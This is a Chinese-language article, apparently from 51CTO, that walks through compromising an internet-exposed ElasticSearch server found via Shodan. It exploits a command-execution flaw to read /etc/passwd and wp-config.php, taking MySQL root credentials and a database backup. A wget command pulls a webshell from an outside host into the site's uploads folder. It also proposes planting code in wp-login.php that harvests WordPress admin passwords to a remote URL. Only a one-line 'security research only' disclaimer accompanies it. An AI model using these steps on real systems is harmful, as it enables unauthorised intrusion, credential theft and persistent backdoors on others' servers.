通过ElasticSearch漏洞获取某站webshell权限

原创
安全 漏洞
ElasticSearch在一些大型企业内部往往部署的比较多,因此在获取某内网权限后,进一步的渗透就非常有意义了。在上一篇《ElasticSearch漏洞实战:通过perl进行反弹shell》中分析了通过perl脚本来获取反弹的shell,反弹的shell具有一定的时效性,本文就非perl方面的渗透进行探讨。

ElasticSearch在一些大型企业内部往往部署的比较多,因此在获取某内网权限后,进一步的渗透就非常有意义了。在上一篇《ElasticSearch漏洞实战:通过perl进行反弹shell》中分析了通过perl脚本来获取反弹的shell,反弹的shell具有一定的时效性,本文就非perl方面的渗透进行探讨。

1.通过shodanhq搜索引擎搜索关键字“Elasticsearch”

首先在网站shodanhq.com注册一个用户,注册成功后需要通过邮箱进行激活,激活后即可使用。在搜索框中输入关键字“Elasticsearch”进行搜索,如图1所示,结果以top countries显示查询记录,在早期搜索结果中中国排名第一,后面以美国部署的服务器较多。在结果列表中随机选择一个IP地址,在本例中选择的是国外的IP。

搜索关键词“ElasticSearch”

图1搜索关键词“ElasticSearch”

2.通过FireFox便携版本进行漏洞测试

在FireFox便携版本输入地址“http://192.121.xxx.xxx:9200/_search?pretty”,然后单击“Load Url”,如图2所示,在Post Data中输入以下代码:

通过FireFox便携版本进行漏洞测试

该代码的目的是读取linux操作系统中的/etc/passwd文件的内容,如果存在漏洞则读取passwd文件内容,反之则说明该漏洞不存在。

搜索关键词“ElasticSearch”

图2测试漏洞是否存在

3.查询敏感文件

在Post data中修改exec(\"cat /etc/passwd\")内容为exec(\"locate *.php \")、exec(\"locate *.sql \")、exec(\"locate *.conf \")等以获取敏感文件信息,如图3所示,表明该服务器可能使用php,且cms系统可能为wordpress。

寻找系统敏感信息

图3寻找系统敏感信息

使用代码以下代码直接获取wp-config.php 文件所在路径“/usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”,如图4所示:

获取wp-config.php的路径

图4获取wp-config.php的路径

4.定位网站和真实路径

通过执行“cat /usr/share/nginx/xxxxxxxxxxxxx/wp-config.php”来读取该文件内容,如图5所示,获取mysql数据库root账号和密码以及网站域名xxxxxxxxxxxxx.com

等信息。通过查看网站所在根目录,还发现有mysql文件备份,通过flashget下载工具将其下载到本地,如图6所示。

获取网站域名等信息

图5获取网站域名等信息

下载数据库文件

图6下载数据库文件#p#

5.获取webshell

通过执行命令:wget -O /usr/share/nginx/xxxxxxa2/__MACOSX/oxxxxxxxa/ wp-content/uploads /my.php http://www.antian365.com/data/cache/2.txt 将webshell下载到本地服务器中/usr/share/nginx/xxxxxx2/__MACOSX/xxxxxxxxxxxxx/ wp-content/uploads目录,webshell地址http://ocXXXXXx.com/wp-content/uploads/my.php,通过中国菜刀进行连接,如图7所示成功获取webshell权限。

获取webshell权限

图7获取webshell权限

6.讨论

在本例中通过命令执行漏洞下载了mysql数据库文件,通过查看该文件知道了wordpress管理员的密码等信息,如图8所示,可以对该密码进行破解,通过破解的密码和用户进行登录,再通过后台来提权,也可以轻松获取webshell后门。

获取wordpress后台管理员密码等信息

图8获取wordpress后台管理员密码等信息

还可以在wp-login.php文件中加入密码记录代码,在if ( force_ssl_admin() && ! is_ssl() )代码结束处加入记录代码,如图9所示,加入后的代码如下:

定期访问http://www.antian365.com/wp-content/plugins/d.txt,即可获取管理员登录密码等信息。

记录wordpress密码代码

图9记录wordpress密码代码

注:本文仅供安全研究使用。

责任编辑:蓝雨泪 来源: 51CTO.com
相关推荐

2010-09-26 16:46:05

2011-04-19 09:47:14

2013-07-11 09:51:15

2010-02-09 18:32:04

2010-09-13 15:40:56

2015-03-06 15:43:39

2020-10-12 09:46:34

漏洞

2013-08-29 15:24:36

2010-11-02 21:17:17

2011-08-24 13:24:52

2009-07-19 10:48:53

LinuxWebShell反弹CmdLine She

2010-09-13 17:17:04

2016-11-14 13:50:56

2022-02-16 11:51:16

McAfee漏洞Windows

2021-01-27 17:24:27

密码root权限漏洞

2013-04-03 12:53:23

Android开发shared_user

2015-03-06 15:31:01

2010-02-02 15:32:31

2013-11-01 11:32:49

2009-12-04 19:29:33

点赞
收藏

51CTO技术栈公众号